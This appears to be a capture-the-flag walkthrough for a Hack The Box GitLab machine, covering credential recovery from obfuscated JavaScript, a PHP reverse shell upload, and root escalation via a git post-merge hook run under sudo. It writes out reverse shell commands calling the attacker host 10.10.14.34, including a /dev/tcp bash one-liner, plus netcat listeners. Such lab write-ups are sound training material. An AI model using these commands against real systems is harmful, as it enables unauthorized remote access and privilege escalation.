Target IP: 10.10.10.114
Exploitation Summary
Initial Exploitation
- Vulnerability: Security through obscurity
- Explanation: Credentials are obscured in javascript function within the website.
Privilege Escalation
- Vulnerability: sudo git pull
- Explanation: hook script for post-merge can be defined to perform code execution as root
Enumeration
nmap -p- -A -T4 10.10.10.114
TCP 22: OpenSSH 7.6p1 TCP 80: nginx
Initial Shell Exploitation
Let’s check out the website
The home page is redirected to the sign in page. The bottom has 2 links of interest. Explore and Help.
Explore link bring us to the Projects page where we can see current projects, groups and snippets. Unfortunately, there’s no content here.
Help page only has a bookmarks.html link that brings us to the following screen:
All links except Gitlab Login point to external sites. When hovering over the Gitlab Login link, it’s showing some javascript code that has a function with a variable defined inside the function. To find out what the variable contains, we can use the development console
- press F12
- click Console tab
- paste only the variable portion of the javascript
- examine the variable _0x4b18
looks like this is login credentials.The easiest way to use this credentials is to bookmark the link (right click on the link):
Now go back to the login page and select the bookmarked link:
The credentials is populated to the sign in form. How convenient. Of course, we can also simply type in the credentials ourselves. Now click on Sign In and we sign successful in to the application
This Gitlab allows us to maintain our projects. Essentially, we can upload any files to the project. So let’s prepare a php reverse shell using the following commands. This will use ip-address 10.10.14.34, port # 443 and name the file shell443.php.
cat /usr/share/webshells/php/php-reverse-shell.php | sed "s/127.0.0.1/10.10.14.34/g" | sed "s/1234/443/g" > shell443.php It’s time to upload the file.
- navigate to project Profile
- click + icon
- select Upload file
- click to select file shell443.php
- click Upload file
The file should now be uploaded. Now make it available to the website.
- scroll down and click Submit merge request
- click Merge
The file is ready. Now use netcat to listen to port 443
nc -nvlp 443
And navigate to http://10.10.10.114/profile/shell443.php
Privilege Escalation
sudo -l
sudo -l is one of the first commands I use to determine if the user has any power to execute some commands as root. Sure enough, we are able to perform git pull.
It’s not immediately clear what we can do to escalate privilege. So do some researches on Google and I am able to find out a feature call git hook. A git hook basically is a trigger to execute some custom scripts when a certain event/action occurs. Couple good read can be found at:
For git pull, hook post-merge scripts can be used and will be triggered when a merge occurs.
To achieve that, we will create a local copy of the project Profile. Then make some changes and perform a merge. And finally doing a sudo git pull on the local copy will trigger the custom post-merge script defined in the local copy. Now, let’s put this into actions.
Make a local copy
cd /tmp cp -r /var/www/html/profile .
Modify shell443.php and perform a merge again
- click on shell443.php
- click Edit
- make some changes (any change will do)
- click Commit changes
- click Submit merge request
- click Merge (just like when we first uploaded the file)
Prepare hook post-merge script
cd /tmp/profile/.git/hooks echo '#!/bin/bash' > post-merge echo 'bash -i >& /dev/tcp/10.10.14.34/4000 0>&1' >> post-merge chmod 755 post-merge
This script, when executed, will connect back to kali machine on port 4000
Netcat listens to port 4000
nc -nvlp 4000
Perform git pull (final trigger)
cd /tmp/profile sudo git pull
root shell obtained.
Loot
We got both user & root flags after rooting the box.
Thank you for the box, Frey & thek.
